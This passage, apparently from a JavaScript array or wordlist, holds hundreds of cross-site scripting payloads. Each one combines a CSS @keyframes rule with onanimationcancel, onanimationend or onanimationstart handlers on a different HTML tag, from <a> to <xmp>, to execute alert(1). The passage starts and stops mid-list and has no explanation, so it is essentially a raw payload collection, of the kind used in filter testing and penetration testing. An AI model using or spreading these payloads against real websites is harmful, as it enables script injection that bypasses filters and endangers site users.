0s 1 x;}</style><img id=x style="position:absolute;" onanimationcancel="alert(1)"></img>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><input id=x style="position:absolute;" onanimationcancel="alert(1)"></input>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ins id=x style="position:absolute;" onanimationcancel="alert(1)"></ins>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><isindex id=x style="position:absolute;" onanimationcancel="alert(1)"></isindex>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style="position:absolute;" onanimationcancel="alert(1)"></kbd>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><keygen id=x style="position:absolute;" onanimationcancel="alert(1)"></keygen>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><label id=x style="position:absolute;" onanimationcancel="alert(1)"></label>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><legend id=x style="position:absolute;" onanimationcancel="alert(1)"></legend>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><li id=x style="position:absolute;" onanimationcancel="alert(1)"></li>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><link id=x style="position:absolute;" onanimationcancel="alert(1)"></link>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><listing id=x style="position:absolute;" onanimationcancel="alert(1)"></listing>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><main id=x style="position:absolute;" onanimationcancel="alert(1)"></main>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><map id=x style="position:absolute;" onanimationcancel="alert(1)"></map>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><mark id=x style="position:absolute;" onanimationcancel="alert(1)"></mark>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style="position:absolute;" onanimationcancel="alert(1)"></marquee>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menu id=x style="position:absolute;" onanimationcancel="alert(1)"></menu>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menuitem id=x style="position:absolute;" onanimationcancel="alert(1)"></menuitem>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meta id=x style="position:absolute;" onanimationcancel="alert(1)"></meta>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meter id=x style="position:absolute;" onanimationcancel="alert(1)"></meter>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><multicol id=x style="position:absolute;" onanimationcancel="alert(1)"></multicol>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nav id=x style="position:absolute;" onanimationcancel="alert(1)"></nav>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nextid id=x style="position:absolute;" onanimationcancel="alert(1)"></nextid>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nobr id=x style="position:absolute;" onanimationcancel="alert(1)"></nobr>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noembed id=x style="position:absolute;" onanimationcancel="alert(1)"></noembed>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noframes id=x style="position:absolute;" onanimationcancel="alert(1)"></noframes>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style="position:absolute;" onanimationcancel="alert(1)"></noscript>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><object id=x style="position:absolute;" onanimationcancel="alert(1)"></object>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style="position:absolute;" onanimationcancel="alert(1)"></ol>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><optgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></optgroup>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><option id=x style="position:absolute;" onanimationcancel="alert(1)"></option>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><output id=x style="position:absolute;" onanimationcancel="alert(1)"></output>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><p id=x style="position:absolute;" onanimationcancel="alert(1)"></p>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><param id=x style="position:absolute;" onanimationcancel="alert(1)"></param>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><picture id=x style="position:absolute;" onanimationcancel="alert(1)"></picture>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><plaintext id=x style="position:absolute;" onanimationcancel="alert(1)"></plaintext>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><pre id=x style="position:absolute;" onanimationcancel="alert(1)"></pre>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><progress id=x style="position:absolute;" onanimationcancel="alert(1)"></progress>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><q id=x style="position:absolute;" onanimationcancel="alert(1)"></q>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rb id=x style="position:absolute;" onanimationcancel="alert(1)"></rb>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rp id=x style="position:absolute;" onanimationcancel="alert(1)"></rp>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rt id=x style="position:absolute;" onanimationcancel="alert(1)"></rt>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rtc id=x style="position:absolute;" onanimationcancel="alert(1)"></rtc>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ruby id=x style="position:absolute;" onanimationcancel="alert(1)"></ruby>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><s id=x style="position:absolute;" onanimationcancel="alert(1)"></s>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><samp id=x style="position:absolute;" onanimationcancel="alert(1)"></samp>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><script id=x style="position:absolute;" onanimationcancel="alert(1)"></script>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><section id=x style="position:absolute;" onanimationcancel="alert(1)"></section>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><select id=x style="position:absolute;" onanimationcancel="alert(1)"></select>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><shadow id=x style="position:absolute;" onanimationcancel="alert(1)"></shadow>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><slot id=x style="position:absolute;" onanimationcancel="alert(1)"></slot>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><small id=x style="position:absolute;" onanimationcancel="alert(1)"></small>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><source id=x style="position:absolute;" onanimationcancel="alert(1)"></source>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><spacer id=x style="position:absolute;" onanimationcancel="alert(1)"></spacer>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><span id=x style="position:absolute;" onanimationcancel="alert(1)"></span>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strike id=x style="position:absolute;" onanimationcancel="alert(1)"></strike>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strong id=x style="position:absolute;" onanimationcancel="alert(1)"></strong>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><style id=x style="position:absolute;" onanimationcancel="alert(1)"></style>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sub id=x style="position:absolute;" onanimationcancel="alert(1)"></sub>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><summary id=x style="position:absolute;" onanimationcancel="alert(1)"></summary>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style="position:absolute;" onanimationcancel="alert(1)"></sup>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><svg id=x style="position:absolute;" onanimationcancel="alert(1)"></svg>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><table id=x style="position:absolute;" onanimationcancel="alert(1)"></table>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tbody id=x style="position:absolute;" onanimationcancel="alert(1)"></tbody>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><td id=x style="position:absolute;" onanimationcancel="alert(1)"></td>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><template id=x style="position:absolute;" onanimationcancel="alert(1)"></template>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><textarea id=x style="position:absolute;" onanimationcancel="alert(1)"></textarea>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tfoot id=x style="position:absolute;" onanimationcancel="alert(1)"></tfoot>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><th id=x style="position:absolute;" onanimationcancel="alert(1)"></th>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><thead id=x style="position:absolute;" onanimationcancel="alert(1)"></thead>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><time id=x style="position:absolute;" onanimationcancel="alert(1)"></time>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><title id=x style="position:absolute;" onanimationcancel="alert(1)"></title>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tr id=x style="position:absolute;" onanimationcancel="alert(1)"></tr>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><track id=x style="position:absolute;" onanimationcancel="alert(1)"></track>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tt id=x style="position:absolute;" onanimationcancel="alert(1)"></tt>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><u id=x style="position:absolute;" onanimationcancel="alert(1)"></u>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style="position:absolute;" onanimationcancel="alert(1)"></ul>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><var id=x style="position:absolute;" onanimationcancel="alert(1)"></var>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><video id=x style="position:absolute;" onanimationcancel="alert(1)"></video>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><wbr id=x style="position:absolute;" onanimationcancel="alert(1)"></wbr>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xmp id=x style="position:absolute;" onanimationcancel="alert(1)"></xmp>' +xss,'<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>' +xss,'<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a>' +xss,'<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationend="alert(1)"></abbr>' +xss,'<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationstart="alert(1)"></abbr>' +xss,'<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationend="alert(1)"></acronym>' +xss,'<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationstart="alert(1)"></acronym>' +xss,'<style>@keyframes x{}</style><address style="animation-name:x" onanimationend="alert(1)"></address>' +xss,'<style>@keyframes x{}</style><address style="animation-name:x" onanimationstart="alert(1)"></address>' +xss,'<style>@keyframes x{}</style><applet style="animation-name:x" onanimationend="alert(1)"></applet>' +xss,'<style>@keyframes x{}</style><applet style="animation-name:x" onanimationstart="alert(1)"></applet>' +xss,'<style>@keyframes x{}</style><area style="animation-name:x" onanimationend="alert(1)"></area>' +xss,'<style>@keyframes x{}</style><area style="animation-name:x" onanimationstart="alert(1)"></area>' +xss,'<style>@keyframes x{}</style><article style="animation-name:x" onanimationend="alert(1)"></article>' +xss,'<style>@keyframes x{}</style><article style="animation-name:x" onanimationstart="alert(1)"></article>' +xss,'<style>@keyframes x{}</style><aside style="animation-name:x" onanimationend="alert(1)"></aside>' +xss,'<style>@keyframes x{}</style><aside style="animation-name:x" onanimationstart="alert(1)"></aside>' +xss,'<style>@keyframes x{}</style><audio style="animation-name:x" onanimationend="alert(1)"></audio>' +xss,'<style>@keyframes x{}</style><audio style="animation-name:x" onanimationstart="alert(1)"></audio>' +xss,'<style>@keyframes x{}</style><b style="animation-name:x" onanimationend="alert(1)"></b>' +xss,'<style>@keyframes x{}</style><b style="animation-name:x" onanimationstart="alert(1)"></b>' +xss,'<style>@keyframes x{}</style><base style="animation-name:x" onanimationend="alert(1)"></base>' +xss,'<style>@keyframes x{}</style><base style="animation-name:x" onanimationstart="alert(1)"></base>' +xss,'<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationend="alert(1)"></basefont>' +xss,'<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationstart="alert(1)"></basefont>' +xss,'<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationend="alert(1)"></bdi>' +xss,'<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationstart="alert(1)"></bdi>' +xss,'<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationend="alert(1)"></bdo>' +xss,'<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationstart="alert(1)"></bdo>' +xss,'<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationend="alert(1)"></bgsound>' +xss,'<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationstart="alert(1)"></bgsound>' +xss,'<style>@keyframes x{}</style><big style="animation-name:x" onanimationend="alert(1)"></big>' +xss,'<style>@keyframes x{}</style><big style="animation-name:x" onanimationstart="alert(1)"></big>' +xss,'<style>@keyframes x{}</style><blink style="animation-name:x" onanimationend="alert(1)"></blink>' +xss,'<style>@keyframes x{}</style><blink style="animation-name:x" onanimationstart="alert(1)"></blink>' +xss,'<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationend="alert(1)"></blockquote>' +xss,'<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationstart="alert(1)"></blockquote>' +xss,'<style>@keyframes x{}</style><body style="animation-name:x" onanimationend="alert(1)"></body>' +xss,'<style>@keyframes x{}</style><body style="animation-name:x" onanimationstart="alert(1)"></body>' +xss,'<style>@keyframes x{}</style><br style="animation-name:x" onanimationend="alert(1)"></br>' +xss,'<style>@keyframes x{}</style><br style="animation-name:x" onanimationstart="alert(1)"></br>' +xss,'<style>@keyframes x{}</style><button style="animation-name:x" onanimationend="alert(1)"></button>' +xss,'<style>@keyframes x{}</style><button style="animation-name:x" onanimationstart="alert(1)"></button>' +xss,'<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationend="alert(1)"></canvas>' +xss,'<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationstart="alert(1)"></canvas>' +xss,'<style>@keyframes x{}</style><caption style="animation-name:x" onanimationend="alert(1)"></caption>' +xss,'<style>@keyframes x{}</style><caption style="animation-name:x" onanimationstart="alert(1)"></caption>' +xss,'<style>@keyframes x{}</style><center style="animation-name:x" onanimationend="alert(1)"></center>' +xss,'<style>@keyframes x{}</style><center style="animation-name:x" onanimationstart="alert(1)"></center>' +xss,'<style>@keyframes x{}</style><cite style="animation-name:x" onanimationend="alert(1)"></cite>' +xss,'<style>@keyframes x{}</style><cite style="animation-name:x" onanimationstart="alert(1)"></cite>' +xss,'<style>@keyframes x{}</style><code style="animation-name:x" onanimationend="alert(1)"></code>' +xss,'<style>@keyframes x{}</style><code style="animation-name:x" onanimationstart="alert(1)"></code>' +xss,'<style>@keyframes x{}</style><col style="animation-name:x" onanimationend="alert(1)"></col>' +xss,'<style>@keyframes x{}</style><col style="animation-name:x" onanimationstart="alert(1)"></col>' +xss,'<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationend="alert(1)"></colgroup>' +xss,'<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationstart="alert(1)"></colgroup>' +xss,'<style>@keyframes x{}</style><command style="animation-name:x" onanimationend="alert(1)"></command>' +xss,'<style>@keyframes x{}</style><command style="animation-name:x" onanimationstart="alert(1)"></command>' +xss,'<style>@keyframes x{}</style><content style="animation-name:x" onanimationend="alert(1)"></content>' +xss,'<style>@keyframes x{}</style><content style="animation-name:x" onanimationstart="alert(1)"></content>' +xss,'<style>@keyframes x{}</style><data style="animation-name:x" onanimationend="alert(1)"></data>' +xss,'<style>@keyframes x{}</style><data style="animation-name:x" onanimationstart="alert(1)"></data>' +xss,'<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationend="alert(1)"></datalist>' +xss,'<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationstart="alert(1)"></datalist>' +xss,'<style>@keyframes x{}</style><dd style="animation-name:x" onanimationend="alert(1)"></dd>' +xss,'<style>@keyframes x{}</style><dd style="animation-name:x" onanimationstart="alert(1)"></dd>' +xss,'<style>@keyframes x{}</style><del style="animation-name:x" onanimationend="alert(1)"></del>' +xss,'<style>@keyframes x{}</style><del style="animation-name:x" onanimationstart="alert(1)"></del>' +xss,'<style>@keyframes x{}</style><details style="animation-name:x" onanimationend="alert(1)"></details>' +xss,'<style>@keyframes x{}</style><details style="animation-name:x" onanimationstart="alert(1)"></details>' +xss,'<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationend="alert(1)"></dfn>' +xss,'<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationstart="alert(1)"></dfn>' +xss,'<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationend="alert(1)"></dialog>' +xss,'<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationstart="alert(1)"></dialog>' +xss,'<style>@keyframes x{}</style><dir style="animation-name:x" onanimationend="alert(1)"></dir>' +xss,'<style>@keyframes x{}</style><dir style="animation-name:x" onanimationstart="alert(1)"></dir>' +xss,'<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div>' +xss,'<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>' +xss,'<style>@keyframes x{}</style><dl style="animation-name:x" onanimationend="alert(1)"></dl>' +xss,'<style>@keyframes x{}</style><dl style="animation-name:x" onanimationstart="alert(1)"></dl>' +xss,'<style>@keyframes x{}</style><dt style="animation-name:x" onanimationend="alert(1)"></dt>' +xss,'<style>@keyframes x{}</style><dt style="animation-name:x" onanimationstart="alert(1)"></dt>' +xss,'<style>@keyframes x{}</style><element style="animation-name:x" onanimationend="alert(1)"></element>' +xss,'<style>@keyframes x{}</style><element style="animation-name:x" onanimationstart="alert(1)"></element>' +xss,'<style>@keyframes x{}</style><em style="animation-name:x" onanimationend="alert(1)"></em>' +xss,'<style>@keyframes x{}</style><em style="animation-name:x" onanimationstart="alert(1)"></em>' +xss,'<style>@keyframes x{}</style><embed style="animation-name:x" onanimationend="alert(1)"></embed>' +xss,'<style>@keyframes x{}</style><embed style="animation-name:x" onanimationstart="alert(1)"></embed>' +xss,'<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationend="alert(1)"></fieldset>' +xss,'<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationstart="alert(1)"></fieldset>' +xss,'<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationend="alert(1)"></figcaption>' +xss,'<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationstart="alert(1)"></figcaption>' +xss,'<style>@keyframes x{}</style><figure style="animation-name:x" onanimationend="alert(1)"></figure>' +xss,'<style>@keyframes x{}</style><figure style="animation-name:x" onanimationstart="alert(1)"></figure>' +xss,'<style>@keyframes x{}</style><font style="animation-name:x" onanimationend="alert(1)"></font>' +xss,'<style>@keyframes x{}</style><font style="animation-name:x" onanimationstart="alert(1)"></font>' +xss,'<style>@keyframes x{}</style><footer style="animation-name:x" onanimationend="alert(1)"></footer>' +xss,'<style>@keyframes x{}</style><footer style="animation-name:x" onanimationstart="alert(1)"></footer>' +xss,'<style>@keyframes x{}</style><form style="animation-name:x" onanimationend="alert(1)"></form>' +xss,'<style>@keyframes x{}</style><form style="animation-name:x" onanimationstart="alert(1)"></form>' +xss,'<style>@keyframes x{}</style><frame style="animation-name:x" onanimationend="alert(1)"></frame>' +xss,'<style>@keyframes x{}</style><frame style="animation-name:x" onanimationstart="alert(1)"></frame>' +xss,'<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationend="alert(1)"></frameset>' +xss,'<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationstart="alert(1)"></frameset>' +xss,'<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationend="alert(1)"></h1>' +xss,'<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationstart="alert(1)"></h1>' +xss,'<style>@keyframes x{}</style><head style="animation-name:x" onanimationend="alert(1)"></head>' +xss,'<style>@keyframes x{}</style><head style="animation-name:x" onanimationstart="alert(1)"></head>' +xss,'<style>@keyframes x{}</style><header style="animation-name:x" onanimationend="alert(1)"></header>' +xss,'<style>@keyframes x{}</style><header style="animation-name:x" onanimationstart="alert(1)"></header>' +xss,'<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationend="alert(1)"></hgroup>' +xss,'<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationstart="alert(1)"></hgroup>' +xss,'<style>@keyframes x{}</style><hr style="animation-name:x" onanimationend="alert(1)"></hr>' +xss,'<style>@keyframes x{}</style><hr style="animation-name:x" onanimationstart="alert(1)"></hr>' +xss,'<style>@keyframes x{}</style><html style="animation-name:x" onanimationend="alert(1)"></html>' +xss,'<style>@keyframes x{}</style><html style="animation-name:x" onanimationstart="alert(1)"></html>' +xss,'<style>@keyframes x{}</style><i style="animation-name:x" onanimationend="alert(1)"></i>' +xss,'<style>@keyframes x{}</style><i style="animation-name:x" onanimationstart="alert(1)"></i>' +xss,'<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationend="alert(1)"></iframe>' +xss,'<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationstart="alert(1)"></iframe>' +xss,'<style>@keyframes x{}</style><image style="animation-name:x" onanimationend="alert(1)"></image>' +xss,'<style>@keyframes x{}</style><image style="animation-name:x" onanimationstart="alert(1)"></image>' +xss,'<style>@keyframes x{}</style><img style="animation-name:x" onanimationend="alert(1)"></img>' +xss,'<style>@keyframes x{}</style><img style="animation-name:x" onanimationstart="alert(1)"></img>' +xss,'<style>@keyframes x{}</style><input style="animation-name:x" onanimationend="alert(1)"></input>' +xss,'<style>@keyframes x{}</style><input style="animation-name:x" onanimationstart="alert(1)"></input>' +xss,'<style>@keyframes x{}</style><ins style="animation-name:x" onanimationend="alert(1)"></ins>' +xss,'<style>@keyframes x{}</style><ins style="animation-name:x" onanimationstart="alert(1)"></ins>' +xss,'<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationend="alert(1)"></isindex>' +xss,'<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationstart="alert(1)"></isindex>' +xss,'<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationend="alert(1)"></kbd>' +xss,'<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationstart="alert(1)"></kbd>' +xss,'<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationend="alert(1)"></keygen>' +xss,'<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationstart="alert(1)"></keygen>' +xss,'<style>@keyframes x{}</style><label style="animation-name:x" onanimationend="alert(1)"></label>' +xss,'<style>@keyframes x{}</style><label style="animation-name:x" onanimationstart="alert(1)"></label>' +xss,'<style>@keyframes x{}</style><legend style="animation-name:x" onanimationend="alert(1)"></legend>' +xss,'<style>@keyframes x{}</style><legend style="animation-name:x" onanimationstart="alert(1)"></legend>' +xss,'<style>@keyframes x{}</style><li style="animation-name:x" onanimationend="alert(1)"></li>' +xss,'<style>@keyframes x{}</style><li style="animation-name:x" onanimationstart="alert(1)"></li>' +xss,'<style>@keyframes x{}</style><link style="animation-name:x" onanimationend="alert(1)"></link>' +xss,'<style>@keyframes x{}</style><link style="animation-name:x" onanimationstart="alert(1)"></link>' +xss,'<style>@keyframes x{}</style><listing style="animation-name:x" onanimationend="alert(1)"></listing>' +xss,'<style>@keyframes x{}</style><listing style="animation-name:x" onanimationstart="alert(1)"></listing>' +xss,'<style>@keyframes x{}</style><main style="animation-name:x" onanimationend="alert(1)"></main>' +xss,'<style>@keyframes x{}</style><main style="animation-name:x" onanimationstart="alert(1)"></main>' +xss,'<style>@keyframes x{}</style><map style="animation-name:x" onanimationend="alert(1)"></map>' +xss,'<style>@keyframes x{}</style><map style="animation-name:x" onanimationstart="alert(1)"></map>' +xss,'<style>@keyframes x{}</style><mark style="animation-name:x" onanimationend="alert(1)"></mark>' +xss,'<style>@keyframes x{}</style><mark style="animation-name:x" onanimationstart="alert(1)"></mark>' +xss,'<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationend="alert(1)"></marquee>' +xss,'<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationstart="alert(1)"></marquee>' +xss,'<style>@keyframes x{}</style><menu style="animation-name:x" onanimationend="alert(1)"></menu>' +xss,'<style>@keyframes x{}</style><menu style="animation-name:x" onanimationstart="alert(1)"></menu>' +xss,'<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationend="alert(1)"></menuitem>' +xss,'<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationstart="alert(1)"></menuitem>' +xss,'<style>@keyframes x{}</style><meta style="animation-name:x" onanimationend="alert(1)"></meta>' +xss,'<style>@keyframes x{}</style><meta style="animation-name:x" onanimationstart="alert(1)"></meta>' +xss,'<style>@keyframes x{}</style><meter style="animation-name:x" onanimationend="alert(1)"></meter>' +xss,'<style>@keyframes x{}</style><meter style="animation-name:x" onanimationstart="alert(1)"></meter>' +xss,'<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationend="alert(1)"></multicol>' +xss,'<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationstart="alert(1)"></multicol>' +xss,'<style>@keyframes 